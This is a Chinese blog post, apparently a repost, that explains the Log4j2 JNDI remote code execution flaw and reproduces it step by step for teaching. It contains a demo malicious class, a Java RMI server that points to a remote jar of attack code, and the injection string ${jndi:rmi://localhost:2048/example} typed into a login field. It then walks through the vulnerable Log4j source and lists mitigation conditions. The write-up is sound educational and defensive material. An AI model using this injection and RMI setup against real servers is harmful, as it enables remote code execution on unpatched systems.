主頁 > 後端開發 > 【緊急】Log4j又發新版2.17.0,只有徹底搞懂漏洞原因,才能以不變應萬變,小白也能看懂

【緊急】Log4j又發新版2.17.0,只有徹底搞懂漏洞原因,才能以不變應萬變,小白也能看懂

2021-12-21 06:13:03 後端開發

1 事件背景

經過一周時間的Log4j2 RCE事件的發酵,事情也變也越來越復雜和有趣,就連 Log4j 官方緊急發布了 2.15.0 版本之后沒有過多久,又發宣告說 2.15.0 版本也沒有完全解決問題,然后進而繼續發布了 2.16.0 版本,大家都以為2.16.0是最終終結版本了,沒想到才過多久又爆雷,Log4j 2.17.0橫空出世,
file
相信各位小伙伴都在加班加點熬夜緊急修復和改正Apache Log4j爆出的安全漏洞,各企業都瑟瑟發抖,連網警都通知各位站長,包括我也收到了湖南長沙高新區網警的通知,
file
我也緊急發布了兩篇教程,給各位小伙伴支招,我之前發布的教程依然有效,

【緊急】Apache Log4j任意代碼執行漏洞安全風險升級修復教程

【緊急】繼續折騰,Log4j再發2.16.0,強烈建議升級

file

file

file

file

雖然,各位小伙伴按照教程一步一步操作能快速解決問題,但是很多小伙伴依舊有很多疑惑,不知其所以然,在這里我給大家詳細分析并復現一下Log4j2漏洞產生的原因,純粹是以學習為目的,

Log4j2漏洞總體來說是通過JNDI注入惡意代碼來完成攻擊,具體的操作方式有RMI和LDAP等,

2 JNDI介紹

2.1 JNDI定義

JNDI(Java Naming and Directory Interface,Java命名和目錄介面)是Java中為命名和目錄服務提供介面的API,JNDI主要由兩部分組成:Naming(命名)和Directory(目錄),其中Naming是指將物件通過唯一識別符號系結到一個背景關系Context,同時可通過唯一識別符號查找獲得物件,而Directory主要指將某一物件的屬性系結到Directory的背景關系DirContext中,同時可通過名稱獲取物件的屬性,同時也可以操作屬性,

2.2 JNDI架構

Java應用程式通過JNDI API訪問目錄服務,而JNDI API會呼叫Naming Manager實體化JNDI SPI,然后通過JNDI SPI去操作命名或目錄服務其如LDAP, DNS,RMI等,JNDI內部已實作了對LDAP,DNS, RMI等目錄服務器的操作API,其架構圖如下所示:

file

2.3 JNDI核心API

類名 解釋
Context 命名服務的介面類,由很多的name-to-object的健值對組成,可以通過該介面將健值對系結到該類中,也可通過該類根據name獲取其系結的物件
InitialContextNaming (命名服務)操作的入口類,通過該類可對命名服務進行相關的操作
DirContext Directory目錄服務的介面類,該類繼承自Context,在Naming服務的基礎上擴展了對于物件屬性的系結和獲取操作
InitialDirContext Directory目錄服務相關操作的入口類,通過該類可進行目錄相關服務的操作

Java通過JNDI API去呼叫服務,例如,我們大家熟悉的odbc資料連接,就是通過JNDI的方式來呼叫資料源的,以下代碼大家應該很熟悉:

<?xml version="1.0" encoding="UTF-8"?>
<Context>
    <Resource name="jndi/person"
            auth="Container"
            type="javax.sql.DataSource"
            username="root"
            password="root"
            driverClassName="com.mysql.jdbc.Driver"
            url="jdbc:mysql://localhost:3306/test"
            maxTotal="8"
            maxIdle="4"/>
</Context>

在Context.xml檔案中我們可以定義資料庫驅動,url、賬號密碼等關鍵資訊,其中name這個欄位的內容為自定義,下面使用InitialContext物件獲取資料源

Connection conn=null; 
PreparedStatement ps = null;
ResultSet rs = null;
try { 
  Context ctx=new InitialContext(); 
  Object datasourceRef=ctx.lookup("java:comp/env/jndi/person"); //參考資料源 
  DataSource ds=(Datasource)datasourceRef; 
  conn = ds.getConnection(); 
  
  //省略部分代碼
  ...
  
  c.close(); 
} catch(Exception e) { 
  e.printStackTrace(); 
} finally { 
  if(conn!=null) { 
    try { 
      conn.close(); 
    } catch(SQLException e) { } 
  } 
}

是不是很熟悉呢?JNDI的其他應用在此我就不多做介紹了,如果還不了解JNDI/RMI/LDAP等相關概念的小伙伴請自行百度一下,

3 攻擊原理

下面我以RMI的方式為例,詳細復現步驟和分析原因,解釋基本攻擊原理之前,我們先來看一張時序圖:

file

1、攻擊者首先發布一個RMI服務,此服務將系結一個參考型別的RMI物件,在參考物件中指定一個遠程的含有惡意代碼的類,例如:包含 system.exit(1) 等類似的危險操作和惡意代碼的下載地址,

2、攻擊者再發布另一個惡意代碼下載服務,此服務可以下載所有含有惡意代碼的類,

3、攻擊者利用Log4j2的漏洞注入RMI呼叫,例如:logger.info("日志資訊 ${jndi:rmi://rmi-service:port/example}"),

4、呼叫RMI后將獲取到參考型別的RMI遠程物件,該物件將就加載惡意代碼并執行,

4 漏洞復現

4.1 創建惡意代碼

創建惡意代碼相關類,以下代碼僅供學習:


package com.tom.example.log4j;

public class HackedClassFactory {

    public HackedClassFactory(){
        System.out.println("程式即將終止");
        System.exit(1);
    }
}

創建HackedClassFactory類的定義,在建構式里寫入終止程式運行的惡意代碼,

4.2 發布惡意代碼

將HackedClassFactory類打成jar包,發布到HTTP服務器上,能通過簡單的Get請求正常下載即可,

file

4.3 創建RMI服務

撰寫如下代碼,并運行程式:


package com.tom.example.rmi;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.util.Hashtable;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

public class HackedRmiService {
    
    public static void main(String[] args) {
        try {
            int port = 2048;  //設定RMI服務遠程監聽埠
            //創建并發布RMI服務
            LocateRegistry.createRegistry(port);
            Hashtable<String, Object> env = new Hashtable<String,Object>();
            env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory");
            env.put(Context.PROVIDER_URL,"rmi://127.0.0.1" + ":" + port);
            Context context = new InitialContext(env);


            String serviceName = "example";
            String serviceClassName = "com.tom.example.log4j.HackedClassFactory";
            //指定惡意代碼的下載地址
            Reference refer = new Reference(
                    serviceName,
                    serviceClassName,
                    "http://127.0.0.1/example/classes.jar");
            ReferenceWrapper wrapper = new ReferenceWrapper(refer);

            //為RMI服務系結一個參考型別的物件,此物件可以被遠程訪問
            context.bind(serviceName,wrapper);

        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

RMI服務啟動之后,即發布了監聽埠為2048的RMI服務,

運行 netstat -ano | find "2048" 命令檢驗,得到如下結果,說明RMI服務已經正常啟動,如下圖:

file

4.4 注入惡意代碼

下面我們利用Log4j的漏洞注入惡意代碼,有已知用戶登錄的業務場景,小伙伴們先不管它是如何實作的,其代碼如下:


@RequestMapping(value="https://www.cnblogs.com/login")
public ResponseEntity login(String loginName,String loginPass){
    
    ResultMsg<?> data = https://www.cnblogs.com/gupaoedu-tom/p/memberService.login(loginName,loginPass);

    //演示代碼,省略業務邏輯,默認為登錄成功
    log.info("登錄成功",loginName);

    String json = JSON.toJSONString(data);

    return ResponseEntity
            .ok()
            .contentType(MediaType.APPLICATION_JSON)
            .body(json);
}

利用Postman測驗,首先正常訪問能得到期望的結果,如下圖所示:

file

用戶登錄成功后會正常回傳token,這看上去是一個常規操作,細心的小伙發現,在登錄成功之后,后臺會列印一條日志且輸出登錄的用戶名,

file

接下來,我做一個非常規操作,將用戶名輸入為 ${jndi:rmi://localhost:2048/example}

file

我們發現程式已經無法回應,再看后臺日志,已經終止運行,

file

這里僅僅只是演示效果,我撰寫的惡意代碼只是終止程式,如果攻擊者注入的是其他惡意代碼,那后果將不堪設想,

5 原始碼分析

通過以上案例還原了攻擊者利用Log4j的漏洞對目標程式進行攻擊的完整程序,接下來分析一下Log4j的原始碼從而了解根本原因,其罪魁禍首是Log4j2 的MessagePatternConverter組件中的format()方法,Log4j在記錄日志的時候會間接的呼叫該方法,具體原始碼如下:

file

從原始碼中我們可以發現該方法會截取 $ 和 { } 之間的字串,將該字符作為查找物件的條件,如果字符是 jndi:rmi 這樣的協議格式則進行JNDI方式的RMI呼叫,從而觸發原生的RMI服務呼叫,具體呼叫位置在StrSubstitutor的substitute()方法:


private int substitute(LogEvent event, StringBuilder buf, int offset, int length, List<String> priorVariables) {

   //此處省略部分代碼
   ...

    this.checkCyclicSubstitution(varName, (List)priorVariables);
    ((List)priorVariables).add(varName);
    String varValue = https://www.cnblogs.com/gupaoedu-tom/p/this.resolveVariable(event, varName, buf, startPos, pos);
    if (varValue == null) {
        varValue = varDefaultValue;
    }
    
     //此處省略部分代碼
    ...
    
}

上述代碼中的resolveVariable()最侄訓呼叫InitialContext的lookup()方法:


protected String resolveVariable(LogEvent event, String variableName, StringBuilder buf, int startPos, int endPos) {
    StrLookup resolver = this.getVariableResolver();
    return resolver == null ? null : resolver.lookup(event, variableName);
}

通過斷點除錯,我們確實發現呼叫了RMI服務,下圖所示:

file

最終惡意代碼通過RMI加載完成以后,會呼叫javax.naming.spi.NamingManager的getObjectFactoryFromReference()方法加載惡意代碼,也就是我們之前寫的com.tom.example.log4j.HackedClassFactory類,首先會在嘗試本地找,如果本地找不到會通過遠程地址加載,也就是我們發布的下載服務,即http://127.0.0.1/example/classes.jar

file

加載遠程代碼之后,通過反射呼叫構造器創建攻擊類的實體,而惡意代碼撰寫在構造器中,所以在被攻擊者的程式中間接執行了惡意代碼,

file

看到這里,小伙伴們是不是有種和SQL注入如出一轍的感覺,

5 風險條件

該漏洞需要滿足以下條件才有可能被攻擊:

1、首先使用的是Logj4j2的漏洞版本,即 <= 2.14.1的版本,

2、攻擊者有機會注入惡意代碼,例如系統中記錄的日志資訊沒有任何特殊過濾,

3、攻擊者需要發布RMI遠程服務和惡意代碼下載服務,

4、被攻擊者的網路可以訪問到RMI服務和惡意代碼下載服務,即被攻擊者的服務器可以隨意訪問公網,或者在內網發布過類似的危險服務,

5、被攻擊者在JVM中開啟了RMI/LDAP等協議的truseURLCodebase屬性為ture,

以上就是我對Log4j2 RCE漏洞的完整復現及根本原因分析,當然最高效的方式還是關閉Lookup相關功能,雖然,官方也在緊急修復,但涉及到軟體升級存在一定風險,還有可能需要大量的重復測驗作業,

我在之前緊急發布的教程依然有效,大家可以繼續參照用最高效可靠的方式解決問題,

【緊急】Apache Log4j任意代碼執行漏洞安全風險升級修復教程

【緊急】繼續折騰,Log4j再發2.16.0,強烈建議升級

本文為“Tom彈架構”原創,轉載請注明出處,技術在于分享,我分享我快樂!
如果本文對您有幫助,歡迎關注和點贊;如果您有任何建議也可留言評論或私信,您的支持是我堅持創作的動力,

原創不易,堅持很酷,都看到這里了,小伙伴記得點贊、收藏、在看,一鍵三連加關注!如果你覺得內容太干,可以分享轉發給朋友滋潤滋潤!

轉載請註明出處,本文鏈接:https://www.uj5u.com/houduan/387690.html

標籤:Java

上一篇:Log4j2又爆雷!2.16.0存在DOS風險,升級2.17.0可解決

下一篇:Redis最常用的使用場景

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 【C++】Microsoft C++、C 和匯編程式檔案

    ......

    uj5u.com 2020-09-10 00:57:23 more
  • 例外宣告

    相比于斷言適用于排除邏輯上不可能存在的狀態,例外通常是用于邏輯上可能發生的錯誤。 例外宣告 Item 1:當函式不可能拋出例外或不能接受拋出例外時,使用noexcept 理由 如果不打算拋出例外的話,程式就會認為無法處理這種錯誤,并且應當盡早終止,如此可以有效地阻止例外的傳播與擴散。 示例 //不可 ......

    uj5u.com 2020-09-10 00:57:27 more
  • Codeforces 1400E Clear the Multiset(貪心 + 分治)

    鏈接:https://codeforces.com/problemset/problem/1400/E 來源:Codeforces 思路:給你一個陣列,現在你可以進行兩種操作,操作1:將一段沒有 0 的區間進行減一的操作,操作2:將 i 位置上的元素歸零。最終問:將這個陣列的全部元素歸零后操作的最少 ......

    uj5u.com 2020-09-10 00:57:30 more
  • UVA11610 【Reverse Prime】

    本人看到此題沒有翻譯,就附帶了一個自己的翻譯版本 思考 這一題,它的第一個要求是找出所有 $7$ 位反向質數及其質因數的個數。 我們應該需要質數篩篩選1~$10^{7}$的所有數,這里就不慢慢介紹了。但是,重讀題,我們突然發現反向質數都是 $7$ 位,而將它反過來后的數字卻是 $6$ 位數,這就說明 ......

    uj5u.com 2020-09-10 00:57:36 more
  • 統計區間素數數量

    1 #pragma GCC optimize(2) 2 #include <bits/stdc++.h> 3 using namespace std; 4 bool isprime[1000000010]; 5 vector<int> prime; 6 inline int getlist(int ......

    uj5u.com 2020-09-10 00:57:47 more
  • C/C++編程筆記:C++中的 const 變數詳解,教你正確認識const用法

    1、C中的const 1、區域const變數存放在堆疊區中,會分配記憶體(也就是說可以通過地址間接修改變數的值)。測驗代碼如下: 運行結果: 2、全域const變數存放在只讀資料段(不能通過地址修改,會發生寫入錯誤), 默認為外部聯編,可以給其他源檔案使用(需要用extern關鍵字修飾) 運行結果: ......

    uj5u.com 2020-09-10 00:58:04 more
  • 【C++犯錯記錄】VS2019 MFC添加資源不懂如何修改資源宏ID

    1. 首先在資源視圖中,添加資源 2. 點擊新添加的資源,復制自動生成的ID 3. 在解決方案資源管理器中找到Resource.h檔案,編輯,使用整個專案搜索和替換的方式快速替換 宏宣告 4. Ctrl+Shift+F 全域搜索,點擊查找全部,然后逐個替換 5. 為什么使用搜索替換而不使用屬性視窗直 ......

    uj5u.com 2020-09-10 00:59:11 more
  • 【C++犯錯記錄】VS2019 MFC不懂的批量添加資源

    1. 打開資源頭檔案Resource.h,在其中預先定義好宏 ID(不清楚其實ID值應該設定多少,可以先新建一個相同的資源項,再在這個資源的ID值的基礎上遞增即可) 2. 在資源視圖中選中專案資源,按F7編輯資源檔案,按 ID 型別 相對路徑的形式添加 資源。(別忘了先把檔案拷貝到專案中的res檔案 ......

    uj5u.com 2020-09-10 01:00:19 more
  • C/C++編程筆記:關于C++的參考型別,專供新手入門使用

    今天要講的是C++中我最喜歡的一個用法——參考,也叫別名。 參考就是給一個變數名取一個變數名,方便我們間接地使用這個變數。我們可以給一個變數創建N個參考,這N + 1個變數共享了同一塊記憶體區域。(參考型別的變數會占用記憶體空間,占用的記憶體空間的大小和指標型別的大小是相同的。雖然參考是一個物件的別名,但 ......

    uj5u.com 2020-09-10 01:00:22 more
  • 【C/C++編程筆記】從頭開始學習C ++:初學者完整指南

    眾所周知,C ++的學習曲線陡峭,但是花時間學習這種語言將為您的職業帶來奇跡,并使您與其他開發人員區分開。您會更輕松地學習新語言,形成真正的解決問題的技能,并在編程的基礎上打下堅實的基礎。 C ++將幫助您養成良好的編程習慣(即清晰一致的編碼風格,在撰寫代碼時注釋代碼,并限制類內部的可見性),并且由 ......

    uj5u.com 2020-09-10 01:00:41 more
最新发布
  • Rust中的智能指標:Box<T> Rc<T> Arc<T> Cell<T> RefCell<T> Weak

    Rust中的智能指標是什么 智能指標(smart pointers)是一類資料結構,是擁有資料所有權和額外功能的指標。是指標的進一步發展 指標(pointer)是一個包含記憶體地址的變數的通用概念。這個地址參考,或 ” 指向”(points at)一些其 他資料 。參考以 & 符號為標志并借用了他們所 ......

    uj5u.com 2023-04-20 07:24:10 more
  • Java的值傳遞和參考傳遞

    值傳遞不會改變本身,參考傳遞(如果傳遞的值需要實體化到堆里)如果發生修改了會改變本身。 1.基本資料型別都是值傳遞 package com.example.basic; public class Test { public static void main(String[] args) { int ......

    uj5u.com 2023-04-20 07:24:04 more
  • [2]SpinalHDL教程——Scala簡單入門

    第一個 Scala 程式 shell里面輸入 $ scala scala> 1 + 1 res0: Int = 2 scala> println("Hello World!") Hello World! 檔案形式 object HelloWorld { /* 這是我的第一個 Scala 程式 * 以 ......

    uj5u.com 2023-04-20 07:23:58 more
  • 理解函式指標和回呼函式

    理解 函式指標 指向函式的指標。比如: 理解函式指標的偽代碼 void (*p)(int type, char *data); // 定義一個函式指標p void func(int type, char *data); // 宣告一個函式func p = func; // 將指標p指向函式func ......

    uj5u.com 2023-04-20 07:23:52 more
  • Django筆記二十五之資料庫函式之日期函式

    本文首發于公眾號:Hunter后端 原文鏈接:Django筆記二十五之資料庫函式之日期函式 日期函式主要介紹兩個大類,Extract() 和 Trunc() Extract() 函式作用是提取日期,比如我們可以提取一個日期欄位的年份,月份,日等資料 Trunc() 的作用則是截取,比如 2022-0 ......

    uj5u.com 2023-04-20 07:23:45 more
  • 一天吃透JVM面試八股文

    什么是JVM? JVM,全稱Java Virtual Machine(Java虛擬機),是通過在實際的計算機上仿真模擬各種計算機功能來實作的。由一套位元組碼指令集、一組暫存器、一個堆疊、一個垃圾回收堆和一個存盤方法域等組成。JVM屏蔽了與作業系統平臺相關的資訊,使得Java程式只需要生成在Java虛擬機 ......

    uj5u.com 2023-04-20 07:23:31 more
  • 使用Java接入小程式訂閱訊息!

    更新完微信服務號的模板訊息之后,我又趕緊把微信小程式的訂閱訊息給實作了!之前我一直以為微信小程式也是要企業才能申請,沒想到小程式個人就能申請。 訊息推送平臺🔥推送下發【郵件】【短信】【微信服務號】【微信小程式】【企業微信】【釘釘】等訊息型別。 https://gitee.com/zhongfuch ......

    uj5u.com 2023-04-20 07:22:59 more
  • java -- 緩沖流、轉換流、序列化流

    緩沖流 緩沖流, 也叫高效流, 按照資料型別分類: 位元組緩沖流:BufferedInputStream,BufferedOutputStream 字符緩沖流:BufferedReader,BufferedWriter 緩沖流的基本原理,是在創建流物件時,會創建一個內置的默認大小的緩沖區陣列,通過緩沖 ......

    uj5u.com 2023-04-20 07:22:49 more
  • Java-SpringBoot-Range請求頭設定實作視頻分段傳輸

    老實說,人太懶了,現在基本都不喜歡寫筆記了,但是網上有關Range請求頭的文章都太水了 下面是抄的一段StackOverflow的代碼...自己大修改過的,寫的注釋挺全的,應該直接看得懂,就不解釋了 寫的不好...只是希望能給視頻網站開發的新手一點點幫助吧. 業務場景:視頻分段傳輸、視頻多段傳輸(理 ......

    uj5u.com 2023-04-20 07:22:42 more
  • Windows 10開發教程_編程入門自學教程_菜鳥教程-免費教程分享

    教程簡介 Windows 10開發入門教程 - 從簡單的步驟了解Windows 10開發,從基本到高級概念,包括簡介,UWP,第一個應用程式,商店,XAML控制元件,資料系結,XAML性能,自適應設計,自適應UI,自適應代碼,檔案管理,SQLite資料庫,應用程式到應用程式通信,應用程式本地化,應用程式 ......

    uj5u.com 2023-04-20 07:22:35 more